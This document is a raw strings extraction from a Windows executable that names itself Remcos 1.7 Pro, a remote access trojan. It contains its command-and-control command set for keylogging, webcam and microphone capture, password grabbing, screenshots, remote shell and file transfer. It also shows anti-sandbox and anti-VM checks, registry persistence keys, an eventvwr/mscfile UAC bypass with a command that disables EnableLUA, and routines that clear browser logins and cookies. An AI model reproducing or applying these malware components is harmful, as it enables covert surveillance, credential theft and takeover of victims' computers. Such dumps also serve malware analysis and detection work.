!This program cannot be run in DOS mode.
vu^viq^
wu^&ps^
vu^vi~^
vu^Rich
`.rdata
@.data
YYPVhT
SSVh#(@
tl9~8tg
8F4t{8
^<v 8^5
F<;F8r
8^5uu8
WWVh,8@
WWVh;8@
8^9u=8^8W
SSVh;8@
SSVhJ8@
W8^9t@
8^8t'8^9
#twHt`HtIHt2Ht
Bt`HtIHt2Ht
vtdHtPHt<Ht(Ht
tTIt=It,It
t=It,It
t]ItIIt2It
t<It(It
2twHt`HtIHt2Ht
gtaHtMHt9Ht)Ht
uD8^-u
utCHt.
t3Jt(Jt Jt
HHt4Ht
HHt4Ht
PPPhr^@
VWVPh`
tV950YA
u$WVVVV
t VVVj
SbieDll.dll
HARDWARE\ACPI\DSDT\VBOX__
PROCMON_WINDOW_CLASS
PROCEXPL
invalid vector<T> subscript
?playaudio
%Y-%m-%d %H.%M
getcamsingleframe
nocamera
startcamcap
closecam
getcamframe
initcamcap
FreeFrame
GetFrame
CloseCamera
OpenCamera
camdlldata
camframe
[DataStart]
[DataStart]0000
%02i:%02i:%02i:%03i [KeepAlive]
Enabled! (Timeout: %i seconds)
Timeout changed to %i
Disabled.
Timeout expired, resetting connection.
eventvwr.exe
Software\Classes\mscfile\shell\open\command
origmsc
mscfile\shell\open\command
searchfinished
filefound
searchwrongpath
searchstarted
offlinelogs
autofflinelogs
{ User has been idle for
minutes }
onlinelogs
[F7]
[F8]
[F9]
[F10]
[F11]
[F12]
[F6]
[Del]
[F1]
[F2]
[F3]
[F4]
[F5]
[Print]
[End]
[Start]
[Left]
[Up]
[Right]
[Down]
[PagDw]
[BckSp]
[Tab]
[Enter]
[Pause]
[Esc]
[PagUp]
[Ctrl + V]
[Following text has been pasted from clipboard:]
[End of clipboard text]
[Ctrl +
[LCtrl]
[RCtrl]
[Following text has been copied to clipboard:]
[End of clipboard text]
[Chrome StoredLogins found, cleared!]
[Chrome StoredLogins not found]
UserProfile
\AppData\Local\Google\Chrome\User Data\Default\Login Data
[Chrome Cookies found, cleared!]
[Chrome Cookies not found]
\AppData\Local\Google\Chrome\User Data\Default\Cookies
[Firefox StoredLogins cleared!]
\key3.db
\logins.json
[Firefox StoredLogins not found]
\AppData\Roaming\Mozilla\Firefox\Profiles\
[Firefox cookies found, cleared!]
\cookies.sqlite
[Firefox Cookies not found]
[IE cookies cleared!]
[IE cookies not found]
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Cookies
[Cleared all cookies & stored logins!]
getfunlib
funready
funfunc
FunFunc
fundlldata
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
Userinit
C:\WINDOWS\system32\userinit.exe,
Software\Microsoft\Windows NT\CurrentVersion\Winlogon\
explorer.exe,
Software\Microsoft\Windows\CurrentVersion\Run\
del %0
start ""
PING 127.0.0.1 -n 2
\install.bat
@RD /Q "
if exist "
" goto Repeat
:Repeat
\uninstall.bat
EXEpath
C:\WINDOWS\system32\userinit.exe
explorer.exe
update.bat
AppData
ProgramFiles
\SysWOW64
\system32
WinDir
SystemDrive
(32 bit)
(64 bit)
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ProductName
Remcos_Mutex_Inj
Software\
SetProcessDEPPolicy
Shell32
IsUserAnAdmin
GetComputerNameExW
IsWow64Process
kernel32
kernel32.dll
GlobalMemoryStatusEx
GetModuleFileNameExW
Kernel32.dll
Psapi.dll
GetModuleFileNameExA
Program Files (x86)\
Program Files\
SETTINGS
C:\Windows\System32\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
autopswdata
pswdata
/stext "
[regsplt]
regmsg
regopened
regcreatekey
regeditval
Shlwapi.dll
SHDeleteKeyA
regdelkey
regdelval
regopen
initregedit
Disconnection occurred, retrying to connect...
addnew
1.7 Pro
Connected to C&C!
%02i:%02i:%02i:%03i [INFO]
Initializing connection to C&C...
initremscript
initfun
dllurl
dlldata
clipboarddata
emptyclipboard
setclipboard
getclipboard
PowrProf.dll
SetSuspendState
OSpower
mclick
keyinput
msgbox
updatefromlocal
updatefromurl
uninstall
deletefile
pwgrab
stopmiccapture
miccapture
freecamcap
getcamlib
screenshotdata
dwnldscr
scrslist
getscrslist
clearlogins
deletekeylog
autogetofflinelogs
getofflinelogs
stoponlinekl
startonlinekl
initklfrm
freescrcap
scrcap
initializescrcap
openaddress
cmdoutput
consolecmd
execcom
closeprocfromwindow
restorewindow
maxwindow
closewindow
getwindows
prockill
proclist
getproclist
downloadfromlocaltofile
downloadfromurltofile
filemgr
keepaliveoff
fileslist
err_notopendir
stopsearch
search
newfolder
showmsg
Unable to rename file!
rename
delete
sendfiledata
upload
download
listfiles
driveslist
getdrives
uploadprogress
subsplt
wndsplt
windowslist
SeShutdownPrivilege
err_notopenfile
filedown
remscripterr
remscriptsuccess
remscriptexecd
ntdll.dll
NtUnmapViewOfSection
DISPLAY
scrshot
User32.dll
GetLastInputInfo
http\shell\open\command
abcdefghijklmnopqrstuvwxyz
cmd.exe
Remcos
GetConsoleWindow
MsgWindowClass
* Breaking-Security.Net
* REMCOS v
CONOUT$
CreateThread
GetModuleHandleA
ExitThread
CreateDirectoryA
WaitForSingleObject
CreateEventA
GetLocalTime
FindClose
FindNextFileW
FindFirstFileW
TerminateThread
SetEvent
SetFileAttributesA
GetFileAttributesA
CloseHandle
RemoveDirectoryA
DeleteFileA
MapViewOfFileEx
CreateFileMappingA
GetProcAddress
LoadLibraryA
GetLastError
FindNextFileA
FindFirstFileA
ExpandEnvironmentStringsA
CopyFileA
GetModuleFileNameA
GetLongPathNameA
CreateMutexA
OpenMutexA
Process32Next
Process32First
CreateToolhelp32Snapshot
SizeofResource
LockResource
LoadResource
FindResourceA
GetLocaleInfoA
Process32NextW
Process32FirstW
lstrlenA
GetDriveTypeA
CreateProcessA
GetTickCount
GlobalUnlock
GlobalLock
GlobalAlloc
WinExec
GetCurrentProcessId
CreateDirectoryW
DeleteFileW
GetFileAttributesW
GetLogicalDriveStringsA
GetCurrentProcess
ResumeThread
SetThreadContext
WriteProcessMemory
VirtualAllocEx
ReadProcessMemory
GetThreadContext
VirtualAlloc
GlobalFree
LocalAlloc
TerminateProcess
ReadFile
PeekNamedPipe
GetStdHandle
CreatePipe
OpenProcess
DuplicateHandle
GetCurrentThread
lstrcpynA
ExitProcess
AllocConsole
KERNEL32.dll
FindWindowA
GetKeyboardLayout
DispatchMessageA
TranslateMessage
GetMessageA
SetWindowsHookExA
CallNextHookEx
GetKeyState
GetWindowTextA
GetWindowTextLengthA
GetForegroundWindow
UnhookWindowsHookEx
CloseClipboard
GetClipboardData
OpenClipboard
SetClipboardData
EmptyClipboard
ExitWindowsEx
MessageBoxA
GetKeyboardLayoutNameA
GetWindowThreadProcessId
ShowWindow
CloseWindow
IsWindowVisible
GetWindowTextW
EnumWindows
SendInput
CreateWindowExA
RegisterClassExA
AppendMenuA
CreatePopupMenu
TrackPopupMenu
SetForegroundWindow
GetCursorPos
DefWindowProcA
USER32.dll
DeleteDC
DeleteObject
GetDIBits
GetObjectA
StretchBlt
SelectObject
CreateCompatibleBitmap
GetDeviceCaps
CreateCompatibleDC
CreateDCA
GDI32.dll
RegOpenKeyExA
RegDeleteKeyA
RegCloseKey
RegQueryValueExA
RegSetValueExA
RegCreateKeyA
RegDeleteValueA
RegEnumValueA
RegEnumKeyExA
RegQueryInfoKeyA
RegCreateKeyExA
AdjustTokenPrivileges
LookupPrivilegeValueA
OpenProcessToken
GetUserNameW
ADVAPI32.dll
ShellExecuteA
ShellExecuteW
ShellExecuteExA
Shell_NotifyIconA
ExtractIconA
SHELL32.dll
?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ
??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z
??0logic_error@std@@QAE@ABV01@@Z
??0out_of_range@std@@QAE@ABV01@@Z
??1out_of_range@std@@UAE@XZ
??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ
?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z
??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z
??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z
??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z
??_D?$basic_fstream@DU?$char_traits@D@std@@@std@@QAEXXZ
?close@?$basic_fstream@DU?$char_traits@D@std@@@std@@QAEXXZ
?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z
?seekp@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z
??0?$basic_fstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z
??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z
??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z
?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ
??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z
?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z
?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB
?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ
??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z
?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ
??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z
?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z
??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z
??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z
??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z
??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ
?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ
??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z
?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ
?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ
??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z
??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z
??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ
?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ
?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH@Z
?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z
?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ
?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ
??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z
??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ
?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ
??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z
?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ
??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z
??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z
?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z
??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z
??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z
??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z
??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z
??8std@@YA_NPBDABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z
?replace@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@IIPBD@Z
?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z
?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ
?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ
?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z
?find_last_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z
??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z
??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@G@Z
?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z
?rfind@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z
?npos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@2IB
?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z
??0Init@ios_base@std@@QAE@XZ
??1Init@ios_base@std@@QAE@XZ
??0_Winit@std@@QAE@XZ
??1_Winit@std@@QAE@XZ
?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z
?find_last_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z
??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z
??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z
??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@DABV10@@Z
?rfind@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z
?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z
?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ
?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ
?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ
??Bios_base@std@@QBEPAXXZ
MSVCP60.dll
_except_handler3
??0exception@@QAE@ABV0@@Z
_CxxThrowException
??2@YAPAXI@Z
strftime
localtime
__CxxFrameHandler
_EH_prolog
malloc
strncmp
printf
wcscmp
tolower
toupper
getenv
sprintf
_wrename
realloc
mbstowcs
freopen
MSVCRT.dll
??1type_info@@UAE@XZ
__dllonexit
_onexit
_XcptFilter
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_controlfp
waveInStart
waveInOpen
waveInAddBuffer
waveInPrepareHeader
waveInUnprepareHeader
waveInClose
waveInStop
WINMM.dll
PathFileExistsA
SHLWAPI.dll
WS2_32.dll
URLDownloadToFileA
urlmon.dll
GdipGetImageEncodersSize
GdipGetImageEncoders
GdiplusStartup
GdipLoadImageFromStream
GdipLoadImageFromStreamICM
GdipFree
GdipDisposeImage
GdipCloneImage
GdipAlloc
GdipSaveImageToStream
GdipSaveImageToFile
gdiplus.dll
InternetCloseHandle
InternetReadFile
InternetOpenUrlA
InternetOpenA
WININET.dll
GetStartupInfoA
.?AVexception@@
.?AVlogic_error@std@@
.?AVout_of_range@std@@
.?AVtype_info@@
UU{LL~57
UU{SStQQfppy
UU{UU{BD
y^_fccgeee
eeeccfeee
ssseee
qomkihkih
QPO*))221`_^Z]r4<
>>>KKKTTTXXX
JJIZYY]d
[\gtrq
SSSaaammmrrrsss
~}_]\EDC
555===NNNUUUTTT
ZYXBA@/..
***,,,<<<<<<
III...555
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
timage/jpeg
timage/png
SETTINGS